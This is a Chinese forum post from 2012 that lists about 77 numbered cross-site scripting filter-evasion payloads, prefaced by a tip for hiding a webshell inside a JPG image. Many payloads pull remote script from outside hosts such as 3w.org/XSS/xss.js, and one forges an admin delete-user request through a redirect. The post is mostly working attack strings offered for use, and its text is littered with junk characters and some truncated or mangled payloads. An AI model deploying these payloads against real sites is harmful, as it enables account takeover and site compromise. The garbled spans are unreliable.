跨站图片shell6 a) _$ }. h! L; o. q
XSS跨站代码 <script>alert("")</script>5 O) z% h; T9 @- y2 b+ x
* f( a/ t( E, T将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
4 o+ Z, l$ G( @0 l+ D/ U7 L1 a0 P
" o7 ?& q9 l5 z% m/ {- ^" u9 m
9 T) r- }/ o* c. _% T+ r4 W
1 L; A# m( X- q C, A$ D. ?1)普通的XSS JavaScript注入$ C$ b9 M8 ~0 _3 }8 P2 D
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; {& U: U7 H) M9 I& l8 P# n* n. S) w+ g& R d+ e; |- G8 ~& y
(2)IMG标签XSS使用JavaScript命令8 Y) E9 T8 B: O. Y& ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 d# ^+ F, |* {3 m# s( @$ ` V& ^, Q: S2 d8 M5 o% o5 b
(3)IMG标签无分号无引号
* }: T0 R9 [# @; J0 S) p- u<IMG SRC=javascript:alert(‘XSS’)>
( L$ U( d% f4 Y: i B; G" ^# _! u6 c G( C
(4)IMG标签大小写不敏感
' E& w+ r- R; a& Z<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" d/ f/ }( P3 O v! g
* o" d; }% A% a6 ^6 {7 u2 U! b; n) k(5)HTML编码(必须有分号)
( M/ U& e3 @( o, r0 q. @5 E1 V<IMG SRC=javascript:alert(“XSS”)>
6 F, L% z1 r; M7 h$ J4 Q! r+ O. ^
(6)修正缺陷IMG标签
# H/ o0 _6 A7 t/ N& T$ R9 F<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
5 e/ ?+ l$ k# n% h6 W* x: O) o6 x+ T5 l/ d& k# f4 T
(7)formCharCode标签(计算器)2 g6 k+ {' r' H( A9 r
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>' C1 Z& i! t: w/ M6 I1 z2 n1 Y
d. n# @( D$ G+ g( |" X' z(8)UTF-8的Unicode编码(计算器)
9 N0 z, a! t/ |: v<IMG SRC=jav..省略..S')>' V0 y7 }' P$ E/ C* O
; b' p- P% I4 b* y
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
/ A* m! @8 L+ ?# n<IMG SRC=jav..省略..S')>2 w& N! F5 o8 t, q) D
4 s% H/ p) S, n2 P4 u
(10)十六进制编码也是没有分号(计算器)
; ?% ~5 @3 Y3 y. y; A<IMG SRC=java..省略..XSS')>
4 j* g! |3 C7 D8 Y9 O+ G) j! X# e3 |/ }% r
(11)嵌入式标签,将Javascript分开
- i3 U5 V/ g$ x0 @/ N( c<IMG SRC=”jav ascript:alert(‘XSS’);”>
) E8 X- V* M, ~6 L% ~
1 ~, W0 q9 U5 J- ~(12)嵌入式编码标签,将Javascript分开0 p0 Z6 J4 \5 k7 P! Z/ a
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 Y: R9 S3 k0 j M, [+ G' e
9 e8 l3 o4 M I+ G) b6 i |(13)嵌入式换行符
) z- g- L6 l( p% b8 {0 Y2 u6 \% V<IMG SRC=”jav ascript:alert(‘XSS’);”>9 T ^# {1 [7 d6 Z$ D+ _
- i: r9 X( H: `) S! p. j8 Z(14)嵌入式回车
+ L/ w, c5 a* m( t<IMG SRC=”jav ascript:alert(‘XSS’);”>. y6 B ?; h7 X V: `
. ?3 _2 d, R- [
(15)嵌入式多行注入JavaScript,这是XSS极端的例子& P5 s' q1 I- K$ Q3 e
<IMG SRC=”javascript:alert(‘XSS‘)”>5 e6 ?3 Y3 `1 s7 N" y# f8 [% E( @
: Z8 k% r. r- L
(16)解决限制字符(要求同页面)
+ y; h+ u" Z- v" }<script>z=’document.’</script>: {) P4 ^- }# h( y; P+ o9 N, S7 U
<script>z=z+’write(“‘</script>+ e7 R' a4 {2 N
<script>z=z+’<script’</script>
8 Y7 v$ n6 {9 H9 v0 X* ?" f<script>z=z+’ src=ht’</script>) T* f" H: i) p$ N9 A% Y) _9 o$ T
<script>z=z+’tp://ww’</script>
3 @! S# O$ E8 @ X' J<script>z=z+’w.shell’</script>
$ o# E) X. X! i% |<script>z=z+’.net/1.’</script>
( e) g* X0 M* ?<script>z=z+’js></sc’</script>
: l' h% K+ K, T7 J$ M# P<script>z=z+’ript>”)’</script>7 b$ p8 U o$ {/ C, [
<script>eval_r(z)</script>" e3 y7 k9 G5 m! d
% N) z/ |9 U: w! p$ w# ?7 ]1 Y
(17)空字符. h" |* H2 t# [' ]) q, |+ G
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 s- t& N0 l1 K' D
2 d+ N3 `! l8 @- c4 N- M' i& Z(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
1 ^7 E. t% W" Z7 }& e/ P, yperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
0 B* j4 r' K2 J. Z1 J1 ^. n6 O2 Z0 l
0 r; H9 ]; f& u7 C0 C) _* q7 ^# R(19)Spaces和meta前的IMG标签
& p8 X' r* r# S+ s9 z; |8 z* p<IMG SRC=” javascript:alert(‘XSS’);”>
N- U+ B$ [$ a$ u, f( G* T4 M1 i3 F/ P$ F0 L# R1 F
(20)Non-alpha-non-digit XSS
% X+ l) Y* j% D8 O& w. H2 ~4 a j<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% |2 s6 d. G N" R, V( }2 t
- b7 ]: k* f( B6 Y(21)Non-alpha-non-digit XSS to 2: b4 n ^3 M- O- F) x2 d, {
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
2 t% |, R) @1 I8 f5 c- u9 t+ W/ @" m, K3 }; o+ C
(22)Non-alpha-non-digit XSS to 3
4 r% y0 G* H) r" O6 W% j2 O<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
+ L3 x( u; ~) i3 H7 J; H& S$ R5 |, c
! N7 L) g# m, ]/ P+ W! ](23)双开括号! Z5 A5 d. Y u7 P; O; @. q
<<SCRIPT>alert(“XSS”);//<</SCRIPT>0 ~! t% E+ w d* l: j
( h+ k' _; m3 N `* e3 N7 s7 R(24)无结束脚本标记(仅火狐等浏览器)) T2 h2 _* G4 }5 v! D8 B0 G
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>* h7 h" n0 w, D4 p# Y
3 A3 f, B3 A5 D7 b1 k( D ~* j; ?. y(25)无结束脚本标记2' j, B* }! {$ q: ^$ ^4 t) D- d3 }
<SCRIPT SRC=//3w.org/XSS/xss.js>0 V L3 v4 I; a' v
. L' y* M+ D5 z/ ^0 f2 k(26)半开的HTML/JavaScript XSS, H. l4 D* ~( }
<IMG SRC=”javascript:alert(‘XSS’)”
$ L- v9 T* `# |2 H9 [3 C- P$ S4 d4 r: s/ d
(27)双开角括号2 G$ q" ~( N3 f8 V& |3 l' Q5 E
<iframe src=http://3w.org/XSS.html <
K1 u; D( V( X& w* N6 L& J$ |6 j6 B! O* \0 k, A: x* n: R% s! r
(28)无单引号 双引号 分号
) H u8 M2 m/ y, L" N0 u<SCRIPT>a=/XSS/4 b5 l9 P0 A! M2 R" ?
alert(a.source)</SCRIPT>
t: g( ^; n J7 k. g
" W* E I( ^4 Z: P- t$ `4 B(29)换码过滤的JavaScript
8 {2 j4 a. O% g$ `$ e3 R6 w\”;alert(‘XSS’);//. I# q' p8 Z7 O: F4 e) _
. B$ Y+ N( J" \+ p6 P: q { h" ^(30)结束Title标签
% F/ G" l7 O6 }! {' ]9 w</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>8 G+ ?$ _( s% J4 C; B" F
7 ]# {( A, Q2 l* l1 W
(31)Input Image
& V G6 p. }. ^$ b5 Y# D6 O<INPUT SRC=”javascript:alert(‘XSS’);”>
! R& a4 x/ M& @; L9 k
3 g7 z/ Y/ N: R& y2 Y(32)BODY Image
! S: L& d7 u$ ?3 c8 X<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
" }$ z6 e. [: O1 l, b# R) f, ?" C
( {' |7 @5 W: H6 @" ~; l$ g(33)BODY标签
8 [( a# P D. j& O Y6 H+ V, h<BODY(‘XSS’)>5 t& F+ c- n" X/ ~* ]( |2 ~
0 Q- ~! E2 ], `. [(34)IMG Dynsrc
( W, L7 F6 J' f0 V, J) V2 P<IMG DYNSRC=”javascript:alert(‘XSS’)”>
, O7 l$ }0 t, x) Q3 c# d! | j d8 { e
(35)IMG Lowsrc& d9 Z$ [: f! Q# ]' d: D
<IMG LOWSRC=”javascript:alert(‘XSS’)”>2 T$ A( g% U- t( R. v
! ^6 L# f0 G% P7 f(36)BGSOUND4 U0 a" k; @1 ?% ? T* _
<BGSOUND SRC=”javascript:alert(‘XSS’);”>6 a1 r; I# g+ \1 I+ q3 F1 u
2 T' ~) a; P9 H0 a(37)STYLE sheet7 D8 _% S3 d2 h+ m0 Z3 W W1 p4 S B
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>9 G, m. R1 `7 d( j9 h7 Q/ _
2 w5 o) H- H7 D2 R(38)远程样式表
& ]$ J H4 G5 a<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>8 }' f8 Q* x6 `, z9 Y" B F. @- F% q
/ Z' x% R+ H! L+ |3 w% H9 b' s9 i
(39)List-style-image(列表式)
2 d: `# a' {4 B% A<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
+ R( Q* ?5 @+ p7 U& X- O. N$ y8 b4 q1 ?# p" T$ l
(40)IMG VBscript
! A" d$ a5 X" E<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS* v" j. L ~% F! j
1 l# w; v! U$ W(41)META链接url* K/ K- f9 d& F4 [+ ^
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>; G8 E9 x) v) d" g
. h- W$ R2 a; m% s- R7 Y(42)Iframe+ u$ _0 e& X4 q2 M
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
5 L9 p7 K' t4 A# u% x/ a8 N( Z(43)Frame
% y, W" j3 w1 N2 m% q- l<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>8 i1 D' U u* O2 i W0 d
5 C) e5 \, y. ~, n# @; X
(44)Table6 \8 x) K0 a$ U! ]: G, @
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
8 ?; ]6 b" ?; P) b% H& D5 |' ~8 s* Y/ t2 E! D. C# N
(45)TD; O6 v9 a/ Y1 P" Q& Y. t
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
0 I6 q) K( }! M- K9 _4 b' G- Q# l( b; V' u5 D Y+ q7 u+ B3 V
(46)DIV background-image
' c' r/ E& W' Y0 i: o$ m, h. j<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 d, C" L! |/ ^! O0 P3 a$ I
, N4 H6 u7 K5 b( a7 O(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
4 B% U4 ^2 U* A/ ~3 Y+ B<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>3 B$ R) C% j8 B2 L6 \# C
0 S/ b. n) g* u$ w7 K3 \(48)DIV expression
% Z6 H1 I5 F& `7 l* O8 G8 s9 I<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
% R( C6 m$ ]" T+ |! V* Y* O" j, x( x" n% F5 ]! @- j2 z8 x
(49)STYLE属性分拆表达
8 R! a8 a! W/ y5 D<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
5 N+ p: x0 Y1 J3 y, [& [& j3 [$ v) o# H9 j& Z% \- T- W
(50)匿名STYLE(组成:开角号和一个字母开头)1 O) [# @3 C# n. ?0 i* X' U# m
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
6 ]) u, u) r8 s' G' |: o, |: T
5 v7 i6 t; Y# y3 f9 B(51)STYLE background-image1 u9 X' H8 {0 a- q( O
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
8 c5 A( y8 {. {( e/ `0 n8 R5 K& i8 L$ B N
(52)IMG STYLE方式/ Y4 ^" m; @/ _* S6 ?) }' r
exppression(alert(“XSS”))’>
- ?- ]/ }/ W, k) ^+ S1 N. ?4 v8 M$ A a2 ?2 ^5 p: Q1 r# g
(53)STYLE background
6 }+ Q# s/ z! a/ x: {# ~! y<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ E7 K9 u6 h% f
( l# \- e, L; w+ ]& N(54)BASE
5 M/ e2 S: W2 h' ~* R1 g<BASE HREF=”javascript:alert(‘XSS’);//”>
0 N0 \6 v& V& C
, X& G) O! T; W(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS- Q' i# d. [+ {4 l8 Q! _% M
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
; L9 R, R- ^9 g; K) _$ M! ~+ D# y- Q% H/ y. n, X3 L5 {
(56)在flash中使用ActionScrpt可以混进你XSS的代码
4 N; t/ ^. } N; W3 @9 h6 E9 ga=”get”;
2 D" T5 ]" u7 I2 k+ ?! p2 }b=”URL(\”";9 q+ {6 b7 F7 H- @3 Z6 ~0 f
c=”javascript:”;
+ o( O! i {& [ Q% qd=”alert(‘XSS’);\”)”;
5 q3 z- D9 C3 Beval_r(a+b+c+d);
! q# m" s! v! G- i1 h8 O z9 v2 P5 e0 ^
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
! f- l6 O) H& T5 m' k3 u4 \; v<HTML xmlns:xss>
5 ]) _" Z! ^5 F1 T2 U" C# Q! Z1 k<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>, N- p8 u4 a' o7 ? Z$ s( f
<xss:xss>XSS</xss:xss>- Y3 R6 a+ X+ d0 P5 M( Q+ O
</HTML>
: H/ X5 Y o8 m7 x! s5 N% E" G( ]& B; l3 P" u* n# D' E
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
) O. d: F8 t. l<SCRIPT SRC=””></SCRIPT>
: y' }* i( j) h8 `% w; N* v5 i- h# @: [9 P3 e
(59)IMG嵌入式命令,可执行任意命令# `% c7 c' T( K1 q
<IMG SRC=”http://www.XXX.com/a.php?a=b”>; Q/ D# S* |2 u( u. _9 _* o
6 M: U; I( Q; P5 s3 U3 k(60)IMG嵌入式命令(a.jpg在同服务器)2 U) i S! P/ S K& y+ e% M
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
8 s; l3 d) B( `9 \* i1 A( S/ Z
7 Q& C( @7 t- f" t(61)绕符号过滤
& E5 X) r% c6 b, I( u1 ] P<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>. q$ [% k. I4 i$ w+ ]0 t- {1 j9 R
0 o Y5 k6 _- O% ~6 @' u7 w(62), s' j8 G% K$ c* O3 k' u0 B% L
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
F8 w5 G; N% k U( q& j k! g7 @0 {" i
(63)9 h: {8 @6 S' o2 @; Z2 S* }5 x
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>( x# t: |$ X5 S3 F5 Q
" s* O. @9 q6 u+ o- T* Q7 t(64)
8 L" U8 [) \2 O1 ^# v<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
# |3 }8 }8 J. M. z$ P% }" ]0 y) H2 T
(65)- a# Q$ B( |8 l' f
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
0 \) \+ @' `/ {+ O3 c8 M
6 s- D# _+ B% o8 p( ] c(66); [7 \; w2 v" r* Q- T1 H
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ u1 Z' N8 z0 C; r" ^' }2 z* U% z2 f# {4 Z; U3 m( `* e5 o
(67); ~2 C) R2 a* a* Q
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
' |* L5 f6 j: q$ s7 ]% l+ r9 q m+ c- \
(68)URL绕行
% N1 S" d* e k<A HREF=”http://127.0.0.1/”>XSS</A>* [, {0 ~/ x8 `+ A0 R
+ u; `1 A/ [6 v W, |, q(69)URL编码8 \! G5 V; k- P
<A HREF=”http://3w.org”>XSS</A>( ?8 D5 J; p0 }7 q
/ U' q# |1 N6 |0 q; {. M
(70)IP十进制) t" ^2 H- o2 d4 T
<A HREF=”http://3232235521″>XSS</A>
1 f: q8 [; R5 U) s1 C
+ S# K1 H8 t/ t2 R! O- Q(71)IP十六进制9 j! {+ S: }* i. `" s; t
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
/ t S8 l( }) }7 Z2 W% a
- C2 K4 W# N( l2 o(72)IP八进制
7 c+ ]& r$ `" V3 Z5 \% e6 X, f<A HREF=”http://0300.0250.0000.0001″>XSS</A>/ |6 m! D3 |5 U' [6 E" J
6 \1 Y: I2 q3 b: H; L
(73)混合编码: r, }. o- S8 ?9 p' j8 C
<A HREF=”h0 E' Q+ \2 A' @0 I4 @8 y( C k
tt p://6 6.000146.0×7.147/”">XSS</A>
; K* e* K! \% s# E8 \: y
; ~5 c9 Y8 o6 \- p5 V1 b& `(74)节省[http:]( R0 p+ ^% l/ A5 f- X3 }. c# V
<A HREF=”//www.google.com/”>XSS</A>+ f4 D# ~4 a$ i" _- i
" k. ^! q% a% f+ J5 s
(75)节省[www]
% `5 K# y( p' f<A HREF=”http://google.com/”>XSS</A>
2 P2 Q, f' P w6 c) }+ e S. p& S( u( k* \7 _
(76)绝对点绝对DNS
3 P6 f* p: T$ G" S: m<A HREF=”http://www.google.com./”>XSS</A>; c" X& K E/ t4 i: K
$ f7 f" u; E' Q- Z- \$ a: c
(77)javascript链接# q6 }0 n& X4 q6 a0 L* Q9 n
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
, `4 N5 Y$ a3 c. F& d# H |
发表于 2012-9-13 17:04:56
收藏
分享
支持
反对